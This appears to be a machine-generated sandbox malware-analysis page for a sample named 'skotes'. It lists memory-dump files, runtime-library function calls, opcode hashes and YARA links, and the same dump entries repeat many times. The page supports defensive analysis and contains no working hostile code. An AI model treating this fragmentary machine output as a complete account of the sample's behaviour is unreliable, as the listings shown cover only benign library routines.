                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                                                                                                                                                                                                                                          • String ID: ij
                                                                                                                                                                                                                                          • API String ID: 1182035702-3994178257
                                                                                                                                                                                                                                          • Opcode ID: 4b877be240103425bb2eb7abc5adbb1418c1effa6e8dab0cfad018408bee7fa2
                                                                                                                                                                                                                                          • Instruction ID: a81093c8bfae80308651480d0e00fbddef4f9d36425cb67a0c538f04cb700c87
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b877be240103425bb2eb7abc5adbb1418c1effa6e8dab0cfad018408bee7fa2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3210A708142068EDF64EFA4C8556EEBBF2FF16320F10092DE161A6291E7725E85CF55
                                                                                                                                                                                                                                          Function 006B78E1 Relevance: 12.1, APIs: 8, Instructions: 106timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 006B7903
                                                                                                                                                                                                                                            • Part of subcall function 006B5CB8: __EH_prolog3_catch.LIBCMT ref: 006B5CBF
                                                                                                                                                                                                                                            • Part of subcall function 006B5CB8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 006B5CF8
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 006B792A
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 006B7936
                                                                                                                                                                                                                                            • Part of subcall function 006B5CB8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 006B5D70
                                                                                                                                                                                                                                            • Part of subcall function 006B5CB8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 006B5D7E
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 006B7982
                                                                                                                                                                                                                                          • Concurrency::location::_Assign.LIBCMT ref: 006B79A3
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 006B79AB
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 006B79BD
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 006B79ED
                                                                                                                                                                                                                                            • Part of subcall function 006B691D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 006B6942
                                                                                                                                                                                                                                            • Part of subcall function 006B691D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 006B6965
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1475861073-0
                                                                                                                                                                                                                                          • Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                                                                                                                          • Instruction ID: 86b1a67e6017a81152cbe1ed659cd84bf4a1931c349b645f094b2cdbaa352890
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 083106B0B08255AACF56BA7844927FEBBB79F85300F0401A9D496DB342DB245DCAC391
                                                                                                                                                                                                                                          Function 006D4C14 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 199COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 006D4C98
                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 006D4D5E
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 006D4DCA
                                                                                                                                                                                                                                            • Part of subcall function 006CB04B: RtlAllocateHeap.NTDLL(00000000,440B685B,?,?,006AD3FC,440B685B,?,006A7A8B,?,?,?,?,?,?,00697465,?), ref: 006CB07D
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 006D4DD3
                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 006D4DF6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                          • String ID: Zl,ml
                                                                                                                                                                                                                                          • API String ID: 1423051803-2199340090
                                                                                                                                                                                                                                          • Opcode ID: 5c00dd9e86c1f66ad951e2de51788b190ce1fe242be7d9b17a82ad86807dacb1
                                                                                                                                                                                                                                          • Instruction ID: 01f9af0a99479dee896e05f3293eb871e3182d69c903207612e867efc1c55d38
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c00dd9e86c1f66ad951e2de51788b190ce1fe242be7d9b17a82ad86807dacb1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA519172A00216ABEB215F649C42FFB36ABDF84754F15412EFD04A7345EF34DC119AA4
                                                                                                                                                                                                                                          Function 006BDD18 Relevance: 10.6, APIs: 7, Instructions: 117threadCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 006BDD91
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 006BDDAE
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 006BDE14
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 006BDE29
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 006BDE3B
                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 006BDE4B
                                                                                                                                                                                                                                          • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 006BDE74
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
